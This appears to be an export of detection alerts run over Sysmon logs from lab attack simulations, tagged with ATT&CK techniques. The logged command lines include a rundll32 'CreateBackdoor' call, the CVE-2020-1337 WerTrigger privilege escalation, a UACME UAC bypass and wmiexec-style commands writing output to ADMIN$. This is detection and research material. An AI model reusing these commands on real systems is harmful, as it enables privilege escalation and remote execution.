d948 C:\Users\IEUser\AppData\Local\Temp\tmp1375\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002085A50800 0x8a585 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51CD-5F93-0000-001073735B00 7624 C:\Users\Public\test.tmp c:\Users\Public\test.tmp ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 243568 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:39.417 747F3D96-9F77-5E75-0000-001090F32000 2416 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\Windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-9F61-5E75-0000-0010686A1E00 4848 C:\Windows\System32\rundll32.exe rundll32 windowscoredeviceinfo.dll,CreateBackdoor ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1," 1 5 4 1 0 0x8000000000000000 342412 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:06:01.636 747F3D96-E939-5F33-0000-0010ACAB0E00 7852 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ MSEDGEWIN10\IEUser 747F3D96-E911-5F33-0000-0020241C0400 0x41c24 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E938-5F33-0000-00109CA00E00 7820 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe WerTrigger.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 5408 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-26 15:47:56.627 365ABB72-B52C-5CEA-0000-00107A0D1100 3388 C:\Windows\System32\notepad.exe 6.1.7600.16385 (win7_rtm.090713-1255) Notepad Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\notepad.exe c:\windows\system32\inetsrv\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3 365ABB72-B26B-5CEA-0000-0010582A0800 2744 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 345 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:48:17.270 747F3D96-2911-5E1E-0000-0010D80A7D00 2416 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "cmd.exe" /c notepad.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2910-5E1E-0000-002082EF7C00 0x7cef82 0 High SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-2910-5E1E-0000-001053F57C00 4448 C:\Windows\System32\cmd.exe cmd.exe /c start ms-browser:// ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5703 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-04 09:10:30.702 747F3D96-A106-5D46-0000-00102425BD03 6604 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-A106-5D46-0000-00107201BD03 1380 C:\Windows\System32\control.exe "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 342411 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:06:00.734 747F3D96-E938-5F33-0000-00101CA50E00 7836 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ MSEDGEWIN10\IEUser 747F3D96-E911-5F33-0000-0020241C0400 0x41c24 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E938-5F33-0000-00109CA00E00 7820 C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe WerTrigger.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," 1 5 4 1 0 0x8000000000000000 344 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:48:16.990 747F3D96-2910-5E1E-0000-001053F57C00 4448 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /c start ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2910-5E1E-0000-002082EF7C00 0x7cef82 0 High SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-2910-5E1E-0000-0010F5F07C00 4612 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," 1 5 4 1 0 0x8000000000000000 344 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:48:16.990 747F3D96-2910-5E1E-0000-001053F57C00 4448 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /c start ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2910-5E1E-0000-002082EF7C00 0x7cef82 0 High SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-2910-5E1E-0000-0010F5F07C00 4612 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," 1 5 4 1 0 0x8000000000000000 344 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:48:16.990 747F3D96-2910-5E1E-0000-001053F57C00 4448 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /c start ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2910-5E1E-0000-002082EF7C00 0x7cef82 0 High SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-2910-5E1E-0000-0010F5F07C00 4612 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1," 1 5 4 1 0 0x8000000000000000 17985 Microsoft-Windows-Sysmon/Operational DC1.insecurebank.local 2019-05-16 01:31:36.443 DFAE8213-BD78-5CDC-0000-001091041300 3136 C:\Windows\System32\cmd.exe 6.3.9600.16384 (winblue_rtm.130821-1623) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /C ipconfig C:\Users\administrator\ insecurebank\Administrator DFAE8213-BD78-5CDC-0000-002005FE1200 0x12fe05 0 High SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3 DFAE8213-BD78-5CDC-0000-0010C7FE1200 3948 C:\Windows\System32\winrshost.exe C:\Windows\system32\WinrsHost.exe -Embedding ",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /all) ,1," 1 5 4 1 0 0x8000000000000000 8050 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-29 20:59:22.128 365ABB72-65AA-5CC7-0000-00104D882400 2116 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /all C:\Users\IEUser\Documents\ IEWIN7\IEUser 365ABB72-5B3A-5CC7-0000-002096080100 0x10896 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-65A9-5CC7-0000-00104E5C2400 3376 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /all ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 8050 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-29 20:59:22.128 365ABB72-65AA-5CC7-0000-00104D882400 2116 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /all C:\Users\IEUser\Documents\ IEWIN7\IEUser 365ABB72-5B3A-5CC7-0000-002096080100 0x10896 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-65A9-5CC7-0000-00104E5C2400 3376 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ",IEWIN7,Microsoft-Windows-Sysmon/Operational Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," 1 5 4 1 0 0x8000000000000000 423991 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:57:29.192 747F3D96-51C9-5F93-0000-001010175B00 8796 C:\Windows\System32\wbem\WmiPrvSE.exe 10.0.17763.1 (WinBuild.160101.0800) WMI Provider Host Microsoft® Windows® Operating System Microsoft Corporation Wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ NT AUTHORITY\NETWORK SERVICE 747F3D96-C50A-5F93-0000-0020E4030000 0x3e4 0 System SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B 00000000-0000-0000-0000-000000000000 836 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243565 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.544 747F3D96-9F69-5E75-0000-0010729F2000 3536 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243565 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.544 747F3D96-9F69-5E75-0000-0010729F2000 3536 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" ),1," 1 5 4 1 0 0x8000000000000000 342409 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:05:38.149 747F3D96-E922-5F33-0000-00107A2B0B00 6952 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E909-5F33-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E90A-5F33-0000-0010863C0100 1740 C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: ),1," 1 5 4 1 0 0x8000000000000000 5134 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 09:46:49.331 747F3D96-5809-5D45-0000-00100B233F00 1380 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D4EA-5D45-0000-00105CD60000 1072 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243565 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.544 747F3D96-9F69-5E75-0000-0010729F2000 3536 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," 1 5 4 1 0 0x8000000000000000 9840 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:35:13.527 365ABB72-B181-5CC8-0000-00108DC71E00 692 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami /all C:\ IEWIN7\IEUser 365ABB72-B17F-5CC8-0000-0020C6A31E00 0x1ea3c6 0 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-B181-5CC8-0000-001023C41E00 1256 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ",IEWIN7,Microsoft-Windows-Sysmon/Operational Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," 1 5 4 1 0 0x8000000000000000 422746 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-20 22:35:26.747 747F3D96-662E-5F8F-0000-001023353800 6748 C:\Windows\System32\wbem\WmiPrvSE.exe 10.0.17763.1 (WinBuild.160101.0800) WMI Provider Host Microsoft® Windows® Operating System Microsoft Corporation Wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ NT AUTHORITY\NETWORK SERVICE 747F3D96-E130-5F8F-0000-0020E4030000 0x3e4 0 System SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B 00000000-0000-0000-0000-000000000000 840 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 342408 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:05:36.545 747F3D96-E920-5F33-0000-001043920A00 5128 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\Windows\system32\cmd.exe" C:\Users\IEUser\ MSEDGEWIN10\IEUser 747F3D96-E911-5F33-0000-0020241C0400 0x41c24 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E914-5F33-0000-001009990500 5144 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i ),1," 1 5 4 1 0 0x8000000000000000 5133 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence - Scheduled Task Management 2019-08-03 09:46:48.842 747F3D96-5808-5D45-0000-0010D1FE3E00 1268 C:\Windows\System32\schtasks.exe 10.0.17763.1 (WinBuild.160101.0800) Task Scheduler Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i C:\Users\IEUser\Desktop\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020FBD31800 0x18d3fb 1 Medium SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 747F3D96-5808-5D45-0000-00106CDC3E00 924 C:\Users\IEUser\Desktop\UACME.exe UACME.exe 34 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9839 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:35:13.512 365ABB72-B181-5CC8-0000-001023C41E00 1256 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /Q 